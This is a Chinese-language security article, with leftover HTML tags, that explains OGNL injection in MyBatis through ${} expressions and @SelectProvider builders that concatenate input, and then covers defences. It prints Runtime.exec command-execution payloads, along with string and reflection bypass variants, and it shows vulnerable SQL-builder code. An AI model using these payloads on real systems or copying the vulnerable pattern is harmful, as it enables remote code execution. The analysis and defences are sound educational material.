MyBatis下的OGNL注入分析与利用<\/h1>

1. MyBatis简介<\/h2>

MyBatis是一款优秀的持久层框架，它简化了JDBC代码，解决了JDBC将结果集封装为Java对象的麻烦。主要特点包括：<\/p>

通过XML或注解方式配置SQL语句<\/li>
将Java对象和SQL语句进行映射<\/li>

自动执行SQL并将结果映射为Java对象<\/li> <\/ul>

1.1 MyBatis核心组件<\/h3>

mybatis-config.xml<\/strong>：核心配置文件，用于生成SqlSessionFactory<\/li>
SqlSessionFactory<\/strong>：生成SqlSession对象<\/li>
SqlSession<\/strong>：执行SQL并返回结果，类似于JDBC中的Connection<\/li>
Executor<\/strong>：底层对象，执行SQL语句<\/li>

MapperStatement<\/strong>：接收输入映射和输出映射<\/li> <\/ol>
2. OGNL注入原理分析<\/h2>
2.1 OGNL表达式在MyBatis中的解析过程<\/h3>
MyBatis在处理SQL语句时，会对包含${}<\/code>的表达式进行OGNL解析：<\/p>
当SQL语句中包含${expression}<\/code>时，MyBatis会提取expression部分<\/li> 将提取的内容作为OGNL表达式执行<\/li> 将执行结果替换到SQL语句中<\/li> <\/ol> 2.2 关键代码分析<\/h3> DynamicSqlSource<\/strong>：处理包含${}<\/code>和动态SQL节点的SQL语句<\/li> TextSqlNode.apply()<\/strong>：解析SQL文本中的表达式<\/li> BindingTokenParser.handleToken()<\/strong>：将${}<\/code>中的内容作为OGNL表达式执行<\/li> <\/ol> 2.3 漏洞触发流程<\/h3> 用户输入被传入apply<\/code>方法<\/li> parse<\/code>方法提取${}<\/code>中的内容<\/li> handleToken<\/code>方法将内容作为OGNL表达式执行<\/li> 执行结果被拼接到SQL语句中<\/li> <\/ol> 3. 利用场景分析<\/h2> 3.1 XML配置中的潜在风险<\/h3> 在XML映射文件中，如果直接使用${}<\/code>表达式且未做过滤，可能导致OGNL注入：<\/p> <select<\/span> id=<\/span>"findUser"<\/span> parameterType=<\/span>"String"<\/span> resultType=<\/span>"User"<\/span>><\/span> <\/span><\/span> SELECT * FROM users WHERE name = '${name}' <\/span><\/span><\/select><\/span> <\/span><\/span><\/code><\/pre>如果攻击者传入${@java.lang.Runtime@getRuntime().exec("calc")}<\/code>作为name参数，将导致命令执行。<\/p> 3.2 防御措施的限制<\/h3> 开发者通常的防御方式：<\/p> 先解析表达式，再添加参数<\/li> 这种方式可以防止直接通过参数注入OGNL表达式<\/li> <\/ul> 3.3 注解方式的利用<\/h3> 3.3.1 常规注解的问题<\/h4> 使用@Select<\/code>等注解时，仍然是先解析再放入参数，无法直接利用：<\/p> @Select<\/span>(<\/span>"SELECT * FROM users WHERE name = '${name}'"<\/span>)<\/span> <\/span><\/span>User findUserByName<\/span>(<\/span>@Param<\/span>(<\/span>"name"<\/span>)<\/span> String name);<\/span> <\/span><\/span><\/code><\/pre>3.3.2 Provider注解的利用<\/h4> @SelectProvider<\/code>等Provider注解存在风险，因为它们是先传入参数再解析：<\/p> @SelectProvider<\/span>(<\/span>type =<\/span> UserSqlBuilder.<\/span>class<\/span>,<\/span> method =<\/span> "buildGetUsersByName"<\/span>)<\/span> <\/span><\/span>List<<\/span>User><\/span> getUsersByName<\/span>(<\/span>String name);<\/span> <\/span><\/span> <\/span><\/span>class<\/span> UserSqlBuilder<\/span> {<\/span> <\/span><\/span> public<\/span> String buildGetUsersByName<\/span>(<\/span>String name)<\/span> {<\/span> <\/span><\/span> return<\/span> "SELECT * FROM users WHERE name = '"<\/span> +<\/span> name +<\/span> "'"<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>这种模式下，如果攻击者控制name参数，可以注入OGNL表达式。<\/p> 4. 漏洞利用方法<\/h2> 4.1 基本利用方式<\/h3> ${<\/span>@java.lang.Runtime@getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc"<\/span>)}<\/span> <\/span><\/span><\/code><\/pre>4.2 绕过限制的技巧<\/h3> 使用字符串拼接：<\/p> ${<\/span>@java.lang.Runtime@getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc"<\/span>.<\/span>toString<\/span>())}<\/span> <\/span><\/span><\/code><\/pre><\/li> 使用反射：<\/p> ${<\/span>@java.lang.Class@forName<\/span>(<\/span>"java.lang.Runtime"<\/span>).<\/span>getMethod<\/span>(<\/span>"getRuntime"<\/span>).<\/span>invoke<\/span>(<\/span>null<\/span>).<\/span>exec<\/span>(<\/span>"calc"<\/span>)}<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 4.3 实际攻击场景<\/h3> 通过Provider注解注入<\/li> 通过XML映射文件注入（需能控制XML内容）<\/li> 通过动态SQL注入<\/li> <\/ol> 5. 防御措施<\/h2> 5.1 最佳实践<\/h3> 避免使用${}<\/code><\/strong>：尽量使用#{}<\/code>预编译方式<\/li> 严格过滤输入<\/strong>：对用户输入进行严格校验<\/li> 禁用危险功能<\/strong>：限制OGNL表达式的执行能力<\/li> <\/ol> 5.2 代码层面的防御<\/h3> 使用预编译语句：<\/p> <select<\/span> id=<\/span>"findUser"<\/span> parameterType=<\/span>"String"<\/span> resultType=<\/span>"User"<\/span>><\/span> <\/span><\/span> SELECT * FROM users WHERE name = #{name} <\/span><\/span><\/select><\/span> <\/span><\/span><\/code><\/pre><\/li> 对Provider注解进行安全处理：<\/p> class<\/span> UserSqlBuilder<\/span> {<\/span> <\/span><\/span> public<\/span> String buildGetUsersByName<\/span>(<\/span>String name)<\/span> {<\/span> <\/span><\/span> \/\/ 对name进行过滤 <\/span><\/span><\/span><\/span> String filteredName =<\/span> filter(<\/span>name);<\/span> <\/span><\/span> return<\/span> "SELECT * FROM users WHERE name = '"<\/span> +<\/span> filteredName +<\/span> "'"<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 5.3 配置层面的防御<\/h3> 限制OGNL的执行权限<\/li> 使用安全的MyBatis配置<\/li> 定期更新MyBatis版本<\/li> <\/ol> 6. 总结<\/h2> MyBatis中的OGNL注入是一个严重的安全问题，特别是在使用动态SQL和Provider注解时风险更高。开发者应当：<\/p> 充分了解MyBatis的安全机制<\/li> 避免直接使用${}<\/code>表达式<\/li> 对用户输入进行严格过滤<\/li> 定期进行安全审计<\/li> <\/ol> 通过合理的安全措施，可以有效防止OGNL注入漏洞的发生。<\/p>